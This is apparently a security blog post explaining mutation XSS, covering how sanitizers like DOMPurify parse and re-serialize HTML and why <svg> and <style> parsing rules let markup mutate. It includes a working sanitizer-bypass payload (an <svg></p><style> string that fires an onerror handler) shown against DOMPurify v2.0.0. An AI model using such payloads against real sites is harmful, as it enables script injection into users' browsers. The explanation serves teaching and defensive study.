mXSS - The Parsing Magics

What is mXSS?

HTML can be mutated (or transformed) by the browser when it is parsed, serialized, and parsed again, for example when the output of a sanitizer (e.g., DOMPurify) is appended to the DOM tree using innerHTML.
In simple terms, abusing the difference between the tree the sanitizer inspected and the tree the browser finally builds is called mXSS (mutation XSS).

How Does an HTML Sanitizer Work?

Parsing: The HTML content is parsed into a DOM tree, either on the server or in the browser.
Sanitization: The sanitizer iterates through the DOM tree and removes any dangerous or harmful content.
Serialization: After sanitizing, the DOM tree is serialized back into an HTML string.
Re-parsing: The serialized HTML is reassigned to innerHTML, triggering another parsing process.
Appending to Document: Finally, the sanitized DOM tree is appended to the document.
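
The steps above can be sketched roughly as follows. This is a minimal illustration, not how any particular sanitizer is implemented: `runPipeline`, `browserSteps`, and the two-tag deny-list are hypothetical names and choices made up for this example. The steps are passed in as functions so the flow can also be exercised outside a browser.

```javascript
// Hypothetical browser-backed steps; they touch the DOM only when called.
const browserSteps = {
  // 1. Parsing: turn the untrusted string into a DOM tree.
  parse: (html) => new DOMParser().parseFromString(html, 'text/html').body,
  // 2. Sanitization: a toy deny-list (real sanitizers use allow-lists).
  clean: (root) => {
    root.querySelectorAll('script, iframe').forEach((el) => el.remove());
  },
  // 3. Serialization: turn the cleaned tree back into a string.
  serialize: (root) => root.innerHTML,
};

function runPipeline(dirty, steps = browserSteps) {
  const tree = steps.parse(dirty);
  steps.clean(tree);
  return steps.serialize(tree);
}

// 4 + 5. Re-parsing and appending happen when the caller assigns the result:
//   container.innerHTML = runPipeline(untrustedInput);
```

The detail that matters for mXSS is the last comment: the string is parsed a second time, and nothing guarantees that the second tree matches the one that was cleaned.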

DOMPurify – Behind The Scenes

DOMPurify is a client-side JavaScript library that sanitizes HTML input to prevent XSS attacks.

Execution Flow

[Figure: DOMPurify execution flow]

DOMPurify Internals

_initDocument
- Uses the DOMParser API to parse the unsafe input into a DOM structure.
_createNodeIterator
- Uses a NodeIterator to traverse each DOM node in order.
_sanitizeElements
- Checks for DOM clobbering and known attack vectors such as mXSS.
- Removes or escapes disallowed tags (e.g., <script>, <iframe>).
_sanitizeShadowDOM
- The normal traversal skips <template> content and Shadow DOM.
- This function recursively dives into those fragments and sanitizes them too.
_sanitizeAttributes
- Goes through each attribute (onclick, href, src, etc.) and strips or modifies malicious ones.
body.innerHTML
- After sanitization, the DOM is serialized back into a clean HTML string, which the caller typically inserts into the page, where it is parsed again.
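
To make the element and attribute passes more concrete, here is a toy version that walks a tree of plain objects instead of real DOM nodes. It is only a sketch of the general idea and not DOMPurify's code: the `{ tag, attrs, children }` node shape, `ALLOWED_TAGS`, `ALLOWED_ATTRS`, and `sanitizeTree` are all invented for this illustration, and URL checks on href and src are left out.

```javascript
// Hypothetical allow-lists, far smaller than any real sanitizer's.
const ALLOWED_TAGS = new Set(['a', 'b', 'i', 'img', 'p', 'u']);
const ALLOWED_ATTRS = new Set(['href', 'id', 'src', 'title']);

// A node is { tag, attrs, children }; text nodes are plain strings.
function sanitizeTree(node) {
  // Attribute pass: drop every attribute that is not allow-listed.
  for (const name of Object.keys(node.attrs)) {
    if (!ALLOWED_ATTRS.has(name)) delete node.attrs[name];
  }
  // Element pass: drop disallowed child elements, keep text and allowed tags.
  node.children = node.children.filter(
    (child) => typeof child === 'string' || ALLOWED_TAGS.has(child.tag)
  );
  // Recurse into the element children that survived.
  for (const child of node.children) {
    if (typeof child !== 'string') sanitizeTree(child);
  }
  return node;
}

const tree = {
  tag: 'p',
  attrs: { id: 'intro', onclick: 'alert(1)' },
  children: ['hi ', { tag: 'script', attrs: {}, children: ['alert(2)'] }],
};
console.log(JSON.stringify(sanitizeTree(tree)));
```

Note that a pass like this only ever judges the tree it is given. It has no way of knowing whether that tree survives serialization and re-parsing unchanged.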

Getting Our Hands Dirty

Let’s see what mXSS is with a small example:

element.innerHTML = '<u>some <i> HTML'

After the assignment, reading innerHTML back returns markup that differs from the input (indented here for readability):

<u>
    some 
    <i> HTML</i>
</u>

This happens because HTML is designed to be fault-tolerant: the parser closes the unclosed <i> and <u> elements for us instead of rejecting the input.
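
A quick way to watch this kind of mutation is to push a string through the parser and read the serialization back. The helper below is a small sketch: `browserRoundTrip` and `describeMutation` are hypothetical names, and the browser-backed default assumes a page context where `document` exists.

```javascript
// Browser-only default: parse via innerHTML, then serialize again.
function browserRoundTrip(html) {
  const template = document.createElement('template');
  template.innerHTML = html;
  return template.innerHTML;
}

// Reports whether parsing and re-serializing changed the markup.
function describeMutation(input, roundTrip = browserRoundTrip) {
  const output = roundTrip(input);
  return { input, output, mutated: output !== input };
}

// In a browser console:
//   describeMutation('<u>some <i> HTML').mutated
```

For the example above, `mutated` should come back true, since the serialized markup gains the closing tags the input lacked.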

The svg Magic

element.innerHTML = '<svg><p>is this in svg?</svg>'

This gets parsed as:

<svg></svg>
<p>is this in svg?</p>

Here, <p> is moved out of <svg> since it’s not a valid child.

More Examples

An <svg> element can’t have <p> as a child.
A <form> element cannot contain a nested <form>.
An HTML <style> element treats everything inside it as text, even if it looks like a tag.

[More such rules here](https://sonarsource.github.io/mxss-cheatsheet/).

The Escape

element.innerHTML = '<svg></p>is this in svg?</svg>'

This gets parsed into:

<svg>
  <p></p>
  is this in svg?
</svg>

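Now mXSS is possible! The stray </p> end tag makes the parser create a <p> element inside <svg>, and that tree cannot be reproduced from its own serialization: when the browser parses <svg><p> again, the <p> is moved out of <svg>. So the tree DOMPurify checks is not the tree the browser builds from DOMPurify’s output.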

<svg></p> becomes a base for mXSS payloads inside <svg>.

Example:

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

DOM becomes:

<svg>
  <p></p>
  <style>
    <a id="</style><img src=1 onerror=alert(1)>"></a>
  </style>
</svg>

Nothing executes at this point: the <img> exists only as text inside the id attribute of <a>. That’s because **<svg> switches the parser to foreign-content rules**, under which the content of <style> is parsed as markup rather than as raw text.

Abuse in DOMPurify v2.0.0

Payload:

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

DOMPurify finds nothing to remove here: in the tree it inspects, <style> sits inside <svg>, so <a> is a real element and the onerror text is just part of the value of its id attribute.

But when DOMPurify’s serialized output is inserted into the DOM using innerHTML, the browser parses it again, and differently:

<svg></svg>
<p></p>
<style><a id="</style>
<img src="1" onerror="alert(1)">
">

Why Does `<svg>` Close Early?

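Even though we expected it to close at the end, the `<p>` start tag in the serialized output causes the parser to exit "foreign content mode."

According to § 13.2.6.5 (parsing tokens in foreign content) of the HTML Standard, when the parser is inside a foreign element (like <svg>) and sees a start tag from a fixed list of HTML-only tags (<p> is on that list, <style> is not), it exits the foreign mode.
It pops <svg> off the stack and reprocesses the <p> tag in HTML mode. The <style> that follows is therefore an ordinary HTML <style>, whose content is raw text up to the first </style>, including the one hidden inside the id attribute.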
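
The breakout decision can be pictured as a simple lookup. The sketch below is an illustration only: `BREAKOUT_START_TAGS` is a partial, hand-picked subset of the start tags named in that section of the spec, the `{ type, name }` token shape and `breaksOutOfForeignContent` are hypothetical, and it models the behavior described in this post (only start tags break out), which may not match the current spec text.

```javascript
// Partial subset of the start tags that force an exit from foreign content.
const BREAKOUT_START_TAGS = new Set([
  'b', 'blockquote', 'br', 'code', 'div', 'em', 'h1', 'i', 'img',
  'li', 'ol', 'p', 'pre', 'span', 'strong', 'table', 'u', 'ul',
]);

// Returns true when the token should pop the parser out of <svg>/<math>.
function breaksOutOfForeignContent(token) {
  return token.type === 'start' && BREAKOUT_START_TAGS.has(token.name);
}

console.log(breaksOutOfForeignContent({ type: 'start', name: 'p' }));     // true
console.log(breaksOutOfForeignContent({ type: 'end', name: 'p' }));       // false
console.log(breaksOutOfForeignContent({ type: 'start', name: 'style' })); // false
```

This is why the same element behaves differently on each pass: the stray </p> end tag leaves the parser inside <svg> on the first parse, while the <p> start tag in the serialized output pushes it back to HTML rules on the second.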

Bonus:

ChatGPT is my friend 😄 – See my chat with it